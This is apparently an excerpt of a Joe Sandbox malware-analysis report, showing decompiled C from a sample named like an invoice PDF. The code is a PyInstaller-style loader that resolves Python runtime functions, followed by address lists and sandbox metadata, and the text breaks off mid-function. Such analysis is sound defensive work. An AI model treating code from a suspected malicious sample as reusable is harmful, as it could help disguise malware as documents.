																										 *0x133ca10 = _t24;
																										__eflags = _t24;
																										if(__eflags != 0) {
																											_t25 = GetProcAddress(_t155, "PyImport_AddModule");
																											 *0x133c9ac = _t25;
																											__eflags = _t25;
																											if(__eflags != 0) {
																												_t26 = GetProcAddress(_t155, "PyImport_ExecCodeModule");
																												 *0x133c9a4 = _t26;
																												__eflags = _t26;
																												if(__eflags != 0) {
																													_t27 = GetProcAddress(_t155, "PyImport_ImportModule");
																													 *0x133c9a8 = _t27;
																													__eflags = _t27;
																													if(__eflags != 0) {
																														_t28 = GetProcAddress(_t155, "PyList_Append");
																														 *0x133c9b8 = _t28;
																														__eflags = _t28;
																														if(__eflags != 0) {
																															_t29 = GetProcAddress(_t155, "PyList_New");
																															 *0x133c9b4 = _t29;
																															__eflags = _t29;
																															if(__eflags != 0) {
																																_t30 = GetProcAddress(_t155, "PyLong_AsLong");
																																 *0x133c9e4 = _t30;
																																__eflags = _t30;
																																if(__eflags != 0) {
																																	_t31 = GetProcAddress(_t155, "PyModule_GetDict");
																																	 *0x133c9cc = _t31;
																																	__eflags = _t31;
																																	if(__eflags != 0) {
																																		_t32 = GetProcAddress(_t155, "PyObject_CallFunction");
																																		 *0x133c9c4 = _t32;
																																		__eflags = _t32;
																																		if(__eflags != 0) {
																																			_t33 = GetProcAddress(_t155, "PyObject_CallFunctionObjArgs");
																																			 *0x133c9c8 = _t33;
																																			__eflags = _t33;
																																			if(__eflags != 0) {
																																				_t34 = GetProcAddress(_t155, "PyObject_SetAttrString");
																																				 *0x133c9b0 = _t34;
																																				__eflags = _t34;
																																				if(__eflags != 0) {
																																					_t35 = GetProcAddress(_t155, "PyObject_GetAttrString");
																																					 *0x133ca18 = _t35;
																																					__eflags = _t35;
																																					if(__eflags != 0) {
																																						_t36 = GetProcAddress(_t155, "PyObject_Str");
																																						 *0x133ca14 = _t36;
																																						__eflags = _t36;
																																						if(__eflags != 0) {
																																							_t37 = GetProcAddress(_t155, "PyRun_SimpleString");
																																							 *0x133c9a0 = _t37;
																																							__eflags = _t37;
																																							if(__eflags != 0) {
																																								_t38 = GetProcAddress(_t155, "PySys_AddWarnOption");
																																								 *0x133c9e0 = _t38;
																																								__eflags = _t38;
																																								if(__eflags != 0) {
																																									_t39 = GetProcAddress(_t155, "PySys_SetArgvEx");
																																									 *0x133c99c = _t39;
																																									__eflags = _t39;
																																									if(__eflags != 0) {
																																										_t40 = GetProcAddress(_t155, "PySys_GetObject");
																																										 *0x133c9f4 = _t40;
																																										__eflags = _t40;
																																										if(__eflags != 0) {
																																											_t41 = GetProcAddress(_t155, "PySys_SetObject");
																																											 *0x133c9e8 = _t41;
																																											__eflags = _t41;
																																											if(__eflags != 0) {
																																												_t42 = GetProcAddress(_t155, "PySys_SetPath");
																																												 *0x133c998 = _t42;
																																												__eflags = _t42;
																																												if(__eflags != 0) {
																																													_t43 = GetProcAddress(_t155, "PyEval_EvalCode");
																																													 *0x133ca04 = _t43;
																																													__eflags = _t43;
																																													if(__eflags != 0) {
																																														_t44 = GetProcAddress(_t155, "PyMarshal_ReadObjectFromString");
																																														 *0x133ca08 = _t44;
																																														__eflags = _t44;
																																														if(__eflags != 0) {
																																															_t45 = GetProcAddress(_t155, "PyUnicode_FromString");
																																															 *0x133c9c0 = _t45;
																																															__eflags = _t45;
																																															if(__eflags != 0) {
																																																_t46 = GetProcAddress(_t155, "Py_DecodeLocale");
																																																 *0x133c9ec = _t46;
																																																__eflags = _t46;
																																																if(__eflags != 0) {
																																																	_t47 = GetProcAddress(_t155, "PyMem_RawFree");
																																																	 *0x133c9f0 = _t47;
																																																	__eflags = _t47;
																																																	if(__eflags != 0) {
																																																		_t48 = GetProcAddress(_t155, "PyUnicode_FromFormat");
																																																		 *0x133c9f8 = _t48;
																																																		__eflags = _t48;
																																																		if(__eflags != 0) {
																																																			_t49 = GetProcAddress(_t155, "PyUnicode_Decode");
																																																			 *0x133ca00 = _t49;
																																																			__eflags = _t49;
																																																			if(__eflags != 0) {
																																																				_t50 = GetProcAddress(_t155, "PyUnicode_DecodeFSDefault");
																																																				 *0x133c9fc = _t50;
																																																				__eflags = _t50;
																																																				if(__eflags != 0) {
																																																					_t51 = GetProcAddress(_t155, "PyUnicode_AsUTF8");
																																																					 *0x133ca1c = _t51;
																																																					__eflags = _t51;
																																																					if(__eflags != 0) {
																																																						__eflags = 0;
																																																						return 0;
																																																					} else {
																																																						_push("Failed to get address for PyUnicode_AsUTF8\n");
																																																						_push("GetProcAddress");
																																																						_t54 = E01311860(_t153, __eflags) | 0xffffffff;
																																																						__eflags = _t54;
																																																						return _t54;
																																																					}
																																																				} else {
																																																					_push("Failed to get address for PyUnicode_DecodeFSDefault\n");
																																																					_push("GetProcAddress");
																																																					_t56 = E01311860(_t153, __eflags) | 0xffffffff;
																																																					__eflags = _t56;
																																																					return _t56;
																																																				}
																																																			} else {
																																																				_push("Failed to get address for PyUnicode_Decode\n");
																																																				_push("GetProcAddress");
																																																				_t58 = E01311860(_t153, __eflags) | 0xffffffff;
																																																				__eflags = _t58;
																																																				return _t58;
																																																			}
																																																		} else {
																																																			_push("Failed to get address for PyUnicode_FromFormat\n");
																																																			_push("GetProcAddress");
																																																			_t60 = E01311860(_t153, __eflags) | 0xffffffff;
																																																			__eflags = _t60;
																																																			return _t60;
																																																		}
																																																	} else {
																																																		_push("Failed to get address for PyMem_RawFree\n");
																																																		_push("GetProcAddress");
																																																		_t62 = E01311860(_t153, __eflags) | 0xffffffff;
																																																		__eflags = _t62;
																																																		return _t62;
																																																	}
																																																} else {
																																																	_push("Failed to get address for Py_DecodeLocale\n");
																																																	_push("GetProcAddress");
																																																	_t64 = E01311860(_t153, __eflags) | 0xffffffff;
																																																	__eflags = _t64;
																																																	return _t64;
																																																}
																																															} else {
																																																_push("Failed to get address for PyUnicode_FromString\n");
																																																_push("GetProcAddress");
																																																_t66 = E01311860(_t153, __eflags) | 0xffffffff;
																																																__eflags = _t66;
																																																return _t66;
																																															}
																																														} else {
																																															_push("Failed to get address for PyMarshal_ReadObjectFromString\n");
																																															_push("GetProcAddress");
																																															_t68 = E01311860(_t153, __eflags) | 0xffffffff;
																																															__eflags = _t68;
																																															return _t68;
																																														}
																																													} else {
																																														_push("Failed to get address for PyEval_EvalCode\n");
																																														_push("GetProcAddress");
																																														_t70 = E01311860(_t153, __eflags) | 0xffffffff;
																																														__eflags = _t70;
																																														return _t70;
																																													}
																																												} else {
																																													_push("Failed to get address for PySys_SetPath\n");
																																													_push("GetProcAddress");
																																													_t72 = E01311860(_t153, __eflags) | 0xffffffff;
																																													__eflags = _t72;
																																													return _t72;
																																												}
																																											} else {
																																												_push("Failed to get address for PySys_SetObject\n");
																																												_push("GetProcAddress");
																																												_t74 = E01311860(_t153, __eflags) | 0xffffffff;
																																												__eflags = _t74;
																																												return _t74;
																																											}
																																										} else {
																																											_push("Failed to get address for PySys_GetObject\n");
																																											_push("GetProcAddress");
																																											_t76 = E01311860(_t153, __eflags) | 0xffffffff;
																																											__eflags = _t76;
																																											return _t76;
																																										}
																																									} else {
																																										_push("Failed to get address for PySys_SetArgvEx\n");
																																										_push("GetProcAddress");
																																										_t78 = E01311860(_t153, __eflags) | 0xffffffff;
																																										__eflags = _t78;
																																										return _t78;
																																									}
																																								} else {
																																									_push("Failed to get address for PySys_AddWarnOption\n");
																																									_push("GetProcAddress");
																																									_t80 = E01311860(_t153, __eflags) | 0xffffffff;
																																									__eflags = _t80;
																																									return _t80;
																																								}
																																							} else {
																																								_push("Failed to get address for PyRun_SimpleString\n");
																																								_push("GetProcAddress");
																																								_t82 = E01311860(_t153, __eflags) | 0xffffffff;
																																								__eflags = _t82;
																																								return _t82;
																																							}
																																						} else {
																																							_push("Failed to get address for PyObject_Str\n");
																																							_push("GetProcAddress");
																																							_t84 = E01311860(_t153, __eflags) | 0xffffffff;
																																							__eflags = _t84;
																																							return _t84;
																																						}
																																					} else {
																																						_push("Failed to get address for PyObject_GetAttrString\n");
																																						_push("GetProcAddress");
																																						_t86 = E01311860(_t153, __eflags) | 0xffffffff;
																																						__eflags = _t86;
																																						return _t86;
																																					}
																																				} else {
																																					_push("Failed to get address for PyObject_SetAttrString\n");
																																					_push("GetProcAddress");
																																					_t88 = E01311860(_t153, __eflags) | 0xffffffff;
																																					__eflags = _t88;
																																					return _t88;
																																				}
																																			} else {
																																				_push("Failed to get address for PyObject_CallFunctionObjArgs\n");
																																				_push("GetProcAddress");
																																				_t90 = E01311860(_t153, __eflags) | 0xffffffff;
																																				__eflags = _t90;
																																				return _t90;
																																			}
																																		} else {
																																			_push("Failed to get address for PyObject_CallFunction\n");
																																			_push("GetProcAddress");
																																			_t92 = E01311860(_t153, __eflags) | 0xffffffff;
																																			__eflags = _t92;
																																			return _t92;
																																		}
																																	} else {
																																		_push("Failed to get address for PyModule_GetDict\n");
																																		_push("GetProcAddress");
																																		_t94 = E01311860(_t153, __eflags) | 0xffffffff;
																																		__eflags = _t94;
																																		return _t94;
																																	}
																																} else {
																																	_push("Failed to get address for PyLong_AsLong\n");
																																	_push("GetProcAddress");
																																	_t96 = E01311860(_t153, __eflags) | 0xffffffff;
																																	__eflags = _t96;
																																	return _t96;
																																}
																															} else {
																																_push("Failed to get address for PyList_New\n");
																																_push("GetProcAddress");
																																_t98 = E01311860(_t153, __eflags) | 0xffffffff;
																																__eflags = _t98;
																																return _t98;
																															}
																														} else {
																															_push("Failed to get address for PyList_Append\n");
																															_push("GetProcAddress");
																															_t100 = E01311860(_t153, __eflags) | 0xffffffff;
																															__eflags = _t100;
																															return _t100;
																														}
																													} else {
																														_push("Failed to get address for PyImport_ImportModule\n");
																														_push("GetProcAddress");
																														_t102 = E01311860(_t153, __eflags) | 0xffffffff;
																														__eflags = _t102;
																														return _t102;
																													}
																												} else {
																													_push("Failed to get address for PyImport_ExecCodeModule\n");
																													_push("GetProcAddress");
																													_t104 = E01311860(_t153, __eflags) | 0xffffffff;
																													__eflags = _t104;
																													return _t104;
																												}
																											} else {
																												_push("Failed to get address for PyImport_AddModule\n");
																												_push("GetProcAddress");
																												_t106 = E01311860(_t153, __eflags) | 0xffffffff;
																												__eflags = _t106;
																												return _t106;
																											}
																										} else {
																											_push("Failed to get address for PyErr_Restore\n");
																											_push("GetProcAddress");
																											_t108 = E01311860(_t153, __eflags) | 0xffffffff;
																											__eflags = _t108;
																											return _t108;
																										}
																									} else {
																										_push("Failed to get address for PyErr_Fetch\n");
																										_push("GetProcAddress");
																										_t110 = E01311860(_t153, __eflags) | 0xffffffff;
																										__eflags = _t110;
																										return _t110;
																									}
																								} else {
																									_push("Failed to get address for PyErr_Print\n");
																									_push("GetProcAddress");
																									_t112 = E01311860(_t153, __eflags) | 0xffffffff;
																									__eflags = _t112;
																									return _t112;
																								}
																							} else {
																								_push("Failed to get address for PyErr_Occurred\n");
																								_push("GetProcAddress");
																								_t114 = E01311860(_t153, __eflags) | 0xffffffff;
																								__eflags = _t114;
																								return _t114;
																							}
																						} else {
																							_push("Failed to get address for PyErr_Clear\n");
																							_push("GetProcAddress");
																							_t116 = E01311860(_t153, __eflags) | 0xffffffff;
																							__eflags = _t116;
																							return _t116;
																						}
																					} else {
																						_push("Failed to get address for PyDict_GetItemString\n");
																						_push("GetProcAddress");
																						_t118 = E01311860(_t153, __eflags) | 0xffffffff;
																						__eflags = _t118;
																						return _t118;
																					}
																				} else {
																					_push("Failed to get address for Py_SetPythonHome\n");
																					_push("GetProcAddress");
																					_t120 = E01311860(_t153, __eflags) | 0xffffffff;
																					__eflags = _t120;
																					return _t120;
																				}
																			} else {
																				_push("Failed to get address for Py_SetProgramName\n");
																				_push("GetProcAddress");
																				_t122 = E01311860(_t153, __eflags) | 0xffffffff;
																				__eflags = _t122;
																				return _t122;
																			}
																		} else {
																			_push("Failed to get address for Py_GetPath\n");
																			_push("GetProcAddress");
																			_t124 = E01311860(_t153, __eflags) | 0xffffffff;
																			__eflags = _t124;
																			return _t124;
																		}
																	} else {
																		_push("Failed to get address for Py_SetPath\n");
																		_push("GetProcAddress");
																		_t126 = E01311860(_t153, __eflags) | 0xffffffff;
																		__eflags = _t126;
																		return _t126;
																	}
																} else {
																	_push("Failed to get address for Py_Initialize\n");
																	_push("GetProcAddress");
																	_t128 = E01311860(_t153, __eflags) | 0xffffffff;
																	__eflags = _t128;
																	return _t128;
																}
															} else {
																_push("Failed to get address for Py_IncRef\n");
																_push("GetProcAddress");
																_t130 = E01311860(_t153, __eflags) | 0xffffffff;
																__eflags = _t130;
																return _t130;
															}
														} else {
															_push("Failed to get address for Py_Finalize\n");
															_push("GetProcAddress");
															_t132 = E01311860(_t153, __eflags) | 0xffffffff;
															__eflags = _t132;
															return _t132;
														}
													} else {
														_push("Failed to get address for Py_DecRef\n");
														_push("GetProcAddress");
														_t134 = E01311860(_t153, __eflags) | 0xffffffff;
														__eflags = _t134;
														return _t134;
													}
												} else {
													_push("Failed to get address for Py_BuildValue\n");
													_push("GetProcAddress");
													_t136 = E01311860(_t153, __eflags) | 0xffffffff;
													__eflags = _t136;
													return _t136;
												}
											} else {
												_push("Failed to get address for Py_VerboseFlag\n");
												_push("GetProcAddress");
												_t138 = E01311860(_t153, __eflags) | 0xffffffff;
												__eflags = _t138;
												return _t138;
											}
										} else {
											_push("Failed to get address for Py_OptimizeFlag\n");
											_push("GetProcAddress");
											_t140 = E01311860(_t153, __eflags) | 0xffffffff;
											__eflags = _t140;
											return _t140;
										}
									} else {
										_push("Failed to get address for Py_NoUserSiteDirectory\n");
										_push("GetProcAddress");
										_t142 = E01311860(_t153, __eflags) | 0xffffffff;
										__eflags = _t142;
										return _t142;
									}
								} else {
									_push("Failed to get address for Py_NoSiteFlag\n");
									_push("GetProcAddress");
									_t144 = E01311860(_t153, __eflags) | 0xffffffff;
									__eflags = _t144;
									return _t144;
								}
							} else {
								_push("Failed to get address for Py_IgnoreEnvironmentFlag\n");
								_push("GetProcAddress");
								_t146 = E01311860(_t153, __eflags) | 0xffffffff;
								__eflags = _t146;
								return _t146;
							}
						} else {
							_push("Failed to get address for Py_FrozenFlag\n");
							_push("GetProcAddress");
							_t148 = E01311860(_t153, __eflags) | 0xffffffff;
							__eflags = _t148;
							return _t148;
						}
					} else {
						_push("Failed to get address for Py_FileSystemDefaultEncoding\n");
						_push("GetProcAddress");
						_t150 = E01311860(_t153, __eflags) | 0xffffffff;
						__eflags = _t150;
						return _t150;
					}
				} else {
					_push("Failed to get address for Py_DontWriteBytecodeFlag\n");
					_push("GetProcAddress");
					return E01311860(_t153, _t207) | 0xffffffff;
				}
			}








































































































                            0x013129f1
                            0x01312a02
                            0x01312a04
                            0x01312a09
                            0x01312a0b
                            0x01312a2b
                            0x01312a2d
                            0x01312a32
                            0x01312a34
                            0x01312a54
                            0x01312a56
                            0x01312a5b
                            0x01312a5d
                            0x01312a7d
                            0x01312a7f
                            0x01312a84
                            0x01312a86
                            0x01312aa6
                            0x01312aa8
                            0x01312aad
                            0x01312aaf
                            0x01312acf
                            0x01312ad1
                            0x01312ad6
                            0x01312ad8
                            0x01312af8
                            0x01312afa
                            0x01312aff
                            0x01312b01
                            0x01312b21
                            0x01312b23
                            0x01312b28
                            0x01312b2a
                            0x01312b4a
                            0x01312b4c
                            0x01312b51
                            0x01312b53
                            0x01312b73
                            0x01312b75
                            0x01312b7a
                            0x01312b7c
                            0x01312b9c
                            0x01312b9e
                            0x01312ba3
                            0x01312ba5
                            0x01312bc5
                            0x01312bc7
                            0x01312bcc
                            0x01312bce
                            0x01312bee
                            0x01312bf0
                            0x01312bf5
                            0x01312bf7
                            0x01312c17
                            0x01312c19
                            0x01312c1e
                            0x01312c20
                            0x01312c40
                            0x01312c42
                            0x01312c47
                            0x01312c49
                            0x01312c69
                            0x01312c6b
                            0x01312c70
                            0x01312c72
                            0x01312c92
                            0x01312c94
                            0x01312c99
                            0x01312c9b
                            0x01312cbb
                            0x01312cbd
                            0x01312cc2
                            0x01312cc4
                            0x01312ce4
                            0x01312ce6
                            0x01312ceb
                            0x01312ced
                            0x01312d0d
                            0x01312d0f
                            0x01312d14
                            0x01312d16
                            0x01312d36
                            0x01312d38
                            0x01312d3d
                            0x01312d3f
                            0x01312d5f
                            0x01312d61
                            0x01312d66
                            0x01312d68
                            0x01312d88
                            0x01312d8a
                            0x01312d8f
                            0x01312d91
                            0x01312db1
                            0x01312db3
                            0x01312db8
                            0x01312dba
                            0x01312dda
                            0x01312ddc
                            0x01312de1
                            0x01312de3
                            0x01312e03
                            0x01312e05
                            0x01312e0a
                            0x01312e0c
                            0x01312e2c
                            0x01312e2e
                            0x01312e33
                            0x01312e35
                            0x01312e55
                            0x01312e57
                            0x01312e5c
                            0x01312e5e
                            0x01312e7e
                            0x01312e80
                            0x01312e85
                            0x01312e87
                            0x01312ea7
                            0x01312ea9
                            0x01312eae
                            0x01312eb0
                            0x01312ed0
                            0x01312ed2
                            0x01312ed7
                            0x01312ed9
                            0x01312ef9
                            0x01312efb
                            0x01312f00
                            0x01312f02
                            0x01312f22
                            0x01312f24
                            0x01312f29
                            0x01312f2b
                            0x01312f4b
                            0x01312f4d
                            0x01312f52
                            0x01312f54
                            0x01312f74
                            0x01312f76
                            0x01312f7b
                            0x01312f7d
                            0x01312f9d
                            0x01312f9f
                            0x01312fa4
                            0x01312fa6
                            0x01312fc6
                            0x01312fc8
                            0x01312fcd
                            0x01312fcf
                            0x01312fef
                            0x01312ff1
                            0x01312ff6
                            0x01312ff8
                            0x01313018
                            0x0131301a
                            0x0131301f
                            0x01313021
                            0x01313041
                            0x01313043
                            0x01313048
                            0x0131304a
                            0x0131306a
                            0x0131306c
                            0x01313071
                            0x01313073
                            0x01313093
                            0x01313095
                            0x0131309a
                            0x0131309c
                            0x013130bc
                            0x013130be
                            0x013130c3
                            0x013130c5
                            0x013130e5
                            0x013130e7
                            0x013130ec
                            0x013130ee
                            0x0131310e
                            0x01313110
                            0x01313115
                            0x01313117
                            0x01313137
                            0x01313139
                            0x0131313e
                            0x01313140
                            0x01313160
                            0x01313162
                            0x01313167
                            0x01313169
                            0x01313189
                            0x0131318b
                            0x01313190
                            0x01313192
                            0x013131b2
                            0x013131b4
                            0x013131b9
                            0x013131bb
                            0x013131db
                            0x013131dd
                            0x013131e2
                            0x013131e4
                            0x013131ff
                            0x01313202
                            0x013131e6
                            0x013131e6
                            0x013131eb
                            0x013131f8
                            0x013131f8
                            0x013131fd
                            0x013131fd
                            0x013131bd
                            0x013131bd
                            0x013131c2
                            0x013131cf
                            0x013131cf
                            0x013131d4
                            0x013131d4
                            0x01313194
                            0x01313194
                            0x01313199
                            0x013131a6
                            0x013131a6
                            0x013131ab
                            0x013131ab
                            0x0131316b
                            0x0131316b
                            0x01313170
                            0x0131317d
                            0x0131317d
                            0x01313182
                            0x01313182
                            0x01313142
                            0x01313142
                            0x01313147
                            0x01313154
                            0x01313154
                            0x01313159
                            0x01313159
                            0x01313119
                            0x01313119
                            0x0131311e
                            0x0131312b
                            0x0131312b
                            0x01313130
                            0x01313130
                            0x013130f0
                            0x013130f0
                            0x013130f5
                            0x01313102
                            0x01313102
                            0x01313107
                            0x01313107
                            0x013130c7
                            0x013130c7
                            0x013130cc
                            0x013130d9
                            0x013130d9
                            0x013130de
                            0x013130de
                            0x0131309e
                            0x0131309e
                            0x013130a3
                            0x013130b0
                            0x013130b0
                            0x013130b5
                            0x013130b5
                            0x01313075
                            0x01313075
                            0x0131307a
                            0x01313087
                            0x01313087
                            0x0131308c
                            0x0131308c
                            0x0131304c
                            0x0131304c
                            0x01313051
                            0x0131305e
                            0x0131305e
                            0x01313063
                            0x01313063
                            0x01313023
                            0x01313023
                            0x01313028
                            0x01313035
                            0x01313035
                            0x0131303a
                            0x0131303a
                            0x01312ffa
                            0x01312ffa
                            0x01312fff
                            0x0131300c
                            0x0131300c
                            0x01313011
                            0x01313011
                            0x01312fd1
                            0x01312fd1
                            0x01312fd6
                            0x01312fe3
                            0x01312fe3
                            0x01312fe8
                            0x01312fe8
                            0x01312fa8
                            0x01312fa8
                            0x01312fad
                            0x01312fba
                            0x01312fba
                            0x01312fbf
                            0x01312fbf
                            0x01312f7f
                            0x01312f7f
                            0x01312f84
                            0x01312f91
                            0x01312f91
                            0x01312f96
                            0x01312f96
                            0x01312f56
                            0x01312f56
                            0x01312f5b
                            0x01312f68
                            0x01312f68
                            0x01312f6d
                            0x01312f6d
                            0x01312f2d
                            0x01312f2d
                            0x01312f32
                            0x01312f3f
                            0x01312f3f
                            0x01312f44
                            0x01312f44
                            0x01312f04
                            0x01312f04
                            0x01312f09
                            0x01312f16
                            0x01312f16
                            0x01312f1b
                            0x01312f1b
                            0x01312edb
                            0x01312edb
                            0x01312ee0
                            0x01312eed
                            0x01312eed
                            0x01312ef2
                            0x01312ef2
                            0x01312eb2
                            0x01312eb2
                            0x01312eb7
                            0x01312ec4
                            0x01312ec4
                            0x01312ec9
                            0x01312ec9
                            0x01312e89
                            0x01312e89
                            0x01312e8e
                            0x01312e9b
                            0x01312e9b
                            0x01312ea0
                            0x01312ea0
                            0x01312e60
                            0x01312e60
                            0x01312e65
                            0x01312e72
                            0x01312e72
                            0x01312e77
                            0x01312e77
                            0x01312e37
                            0x01312e37
                            0x01312e3c
                            0x01312e49
                            0x01312e49
                            0x01312e4e
                            0x01312e4e
                            0x01312e0e
                            0x01312e0e
                            0x01312e13
                            0x01312e20
                            0x01312e20
                            0x01312e25
                            0x01312e25
                            0x01312de5
                            0x01312de5
                            0x01312dea
                            0x01312df7
                            0x01312df7
                            0x01312dfc
                            0x01312dfc
                            0x01312dbc
                            0x01312dbc
                            0x01312dc1
                            0x01312dce
                            0x01312dce
                            0x01312dd3
                            0x01312dd3
                            0x01312d93
                            0x01312d93
                            0x01312d98
                            0x01312da5
                            0x01312da5
                            0x01312daa
                            0x01312daa
                            0x01312d6a
                            0x01312d6a
                            0x01312d6f
                            0x01312d7c
                            0x01312d7c
                            0x01312d81
                            0x01312d81
                            0x01312d41
                            0x01312d41
                            0x01312d46
                            0x01312d53
                            0x01312d53
                            0x01312d58
                            0x01312d58
                            0x01312d18
                            0x01312d18
                            0x01312d1d
                            0x01312d2a
                            0x01312d2a
                            0x01312d2f
                            0x01312d2f
                            0x01312cef
                            0x01312cef
                            0x01312cf4
                            0x01312d01
                            0x01312d01
                            0x01312d06
                            0x01312d06
                            0x01312cc6
                            0x01312cc6
                            0x01312ccb
                            0x01312cd8
                            0x01312cd8
                            0x01312cdd
                            0x01312cdd
                            0x01312c9d
                            0x01312c9d
                            0x01312ca2
                            0x01312caf
                            0x01312caf
                            0x01312cb4
                            0x01312cb4
                            0x01312c74
                            0x01312c74
                            0x01312c79
                            0x01312c86
                            0x01312c86
                            0x01312c8b
                            0x01312c8b
                            0x01312c4b
                            0x01312c4b
                            0x01312c50
                            0x01312c5d
                            0x01312c5d
                            0x01312c62
                            0x01312c62
                            0x01312c22
                            0x01312c22
                            0x01312c27
                            0x01312c34
                            0x01312c34
                            0x01312c39
                            0x01312c39
                            0x01312bf9
                            0x01312bf9
                            0x01312bfe
                            0x01312c0b
                            0x01312c0b
                            0x01312c10
                            0x01312c10
                            0x01312bd0
                            0x01312bd0
                            0x01312bd5
                            0x01312be2
                            0x01312be2
                            0x01312be7
                            0x01312be7
                            0x01312ba7
                            0x01312ba7
                            0x01312bac
                            0x01312bb9
                            0x01312bb9
                            0x01312bbe
                            0x01312bbe
                            0x01312b7e
                            0x01312b7e
                            0x01312b83
                            0x01312b90
                            0x01312b90
                            0x01312b95
                            0x01312b95
                            0x01312b55
                            0x01312b55
                            0x01312b5a
                            0x01312b67
                            0x01312b67
                            0x01312b6c
                            0x01312b6c
                            0x01312b2c
                            0x01312b2c
                            0x01312b31
                            0x01312b3e
                            0x01312b3e
                            0x01312b43
                            0x01312b43
                            0x01312b03
                            0x01312b03
                            0x01312b08
                            0x01312b15
                            0x01312b15
                            0x01312b1a
                            0x01312b1a
                            0x01312ada
                            0x01312ada
                            0x01312adf
                            0x01312aec
                            0x01312aec
                            0x01312af1
                            0x01312af1
                            0x01312ab1
                            0x01312ab1
                            0x01312ab6
                            0x01312ac3
                            0x01312ac3
                            0x01312ac8
                            0x01312ac8
                            0x01312a88
                            0x01312a88
                            0x01312a8d
                            0x01312a9a
                            0x01312a9a
                            0x01312a9f
                            0x01312a9f
                            0x01312a5f
                            0x01312a5f
                            0x01312a64
                            0x01312a71
                            0x01312a71
                            0x01312a76
                            0x01312a76
                            0x01312a36
                            0x01312a36
                            0x01312a3b
                            0x01312a48
                            0x01312a48
                            0x01312a4d
                            0x01312a4d
                            0x01312a0d
                            0x01312a0d
                            0x01312a12
                            0x01312a24
                            0x01312a24

                            APIs
                            • GetProcAddress.KERNEL32(01313587,Py_DontWriteBytecodeFlag), ref: 01312A02
                            • GetProcAddress.KERNEL32(01313587,Py_FileSystemDefaultEncoding), ref: 01312A2B
                              • Part of subcall function 01311860: GetLastError.KERNEL32(?,?), ref: 0131187D
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.561842894.0000000001311000.00000020.00020000.sdmp, Offset: 01310000, based on PE: true
                            • Associated: 00000001.00000002.561835714.0000000001310000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561880216.0000000001330000.00000002.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561904778.000000000133C000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561919978.0000000001345000.00000004.00020000.sdmp Download File
                            • Associated: 00000001.00000002.561927208.0000000001347000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_1310000_Cab_Invoice_pdf.jbxd
                            Similarity
                            • API ID: AddressProc$ErrorLast
                            • String ID: Failed to get address for PyDict_GetItemString$Failed to get address for PyErr_Clear$Failed to get address for PyErr_Fetch$Failed to get address for PyErr_Occurred$Failed to get address for PyErr_Print$Failed to get address for PyErr_Restore$Failed to get address for PyEval_EvalCode$Failed to get address for PyImport_AddModule$Failed to get address for PyImport_ExecCodeModule$Failed to get address for PyImport_ImportModule$Failed to get address for PyList_Append$Failed to get address for PyList_New$Failed to get address for PyLong_AsLong$Failed to get address for PyMarshal_ReadObjectFromString$Failed to get address for PyMem_RawFree$Failed to get address for PyModule_GetDict$Failed to get address for PyObject_CallFunction$Failed to get address for PyObject_CallFunctionObjArgs$Failed to get address for PyObject_GetAttrString$Failed to get address for PyObject_SetAttrString$Failed to get address for PyObject_Str$Failed to get address for PyRun_SimpleString$Failed to get address for PySys_AddWarnOption$Failed to get address for PySys_GetObject$Failed to get address for PySys_SetArgvEx$Failed to get address for PySys_SetObject$Failed to get address for PySys_SetPath$Failed to get address for PyUnicode_AsUTF8$Failed to get address for PyUnicode_Decode$Failed to get address for PyUnicode_DecodeFSDefault$Failed to get address for PyUnicode_FromFormat$Failed to get address for PyUnicode_FromString$Failed to get address for Py_BuildValue$Failed to get address for Py_DecRef$Failed to get address for Py_DecodeLocale$Failed to get address for Py_DontWriteBytecodeFlag$Failed to get address for Py_FileSystemDefaultEncoding$Failed to get address for Py_Finalize$Failed to get address for Py_FrozenFlag$Failed to get address for Py_GetPath$Failed to get address for Py_IgnoreEnvironmentFlag$Failed to get address for Py_IncRef$Failed to get address for Py_Initialize$Failed to get address for Py_NoSiteFlag$Failed to get address for Py_NoUserSiteDirectory$Failed to get address for Py_OptimizeFlag$Failed to get address for Py_SetPath$Failed to get address for Py_SetProgramName$Failed to get address for Py_SetPythonHome$Failed to get address for Py_VerboseFlag$GetProcAddress$PyDict_GetItemString$PyErr_Clear$PyErr_Fetch$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyList_Append$PyList_New$PyLong_AsLong$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyRun_SimpleString$PySys_AddWarnOption$PySys_GetObject$PySys_SetArgvEx$PySys_SetObject$PySys_SetPath$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$Py_BuildValue$Py_DecRef$Py_DecodeLocale$Py_DontWriteBytecodeFlag$Py_FileSystemDefaultEncoding$Py_Finalize$Py_FrozenFlag$Py_GetPath$Py_IgnoreEnvironmentFlag$Py_IncRef$Py_Initialize$Py_NoSiteFlag$Py_NoUserSiteDirectory$Py_OptimizeFlag$Py_SetPath$Py_SetProgramName$Py_SetPythonHome$Py_VerboseFlag
                            • API String ID: 4214558900-925859108
                            • Opcode ID: 38c9960c825e057e3b55d35cf242dac6b495d8c461bc580ff28b3022ecb1116e
                            • Instruction ID: d343b09d3d70e09933d2eed9ef48c94462d06f4c8becccbebfae63663afa05a8
                            • Opcode Fuzzy Hash: 38c9960c825e057e3b55d35cf242dac6b495d8c461bc580ff28b3022ecb1116e
                            • Instruction Fuzzy Hash: FF02F862B85B0A61D51D3A3F7C068CE6A984EE167EB11533BF520E03EDFBD0C04659AD
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 01314740, Relevance: 24.6, APIs: 5, Strings: 9, Instructions: 99libraryloaderCOMMON
                            Download Yara Rule
                            C-Code - Quality: 22%
                            			E01314740(void* __edx, char* _a4) {
				short* _v24;
				intOrPtr _v28;
				char _v32;
				int _t18;
				short* _t23;
				void* _t24;
				void* _t25;
				char* _t26;
				struct HINSTANCE__* _t27;
				int _t28;
				intOrPtr* _t30;
				intOrPtr* _t32;

				_t25 = __edx;
				_t33 =  &_v32;
				_t26 = _a4;
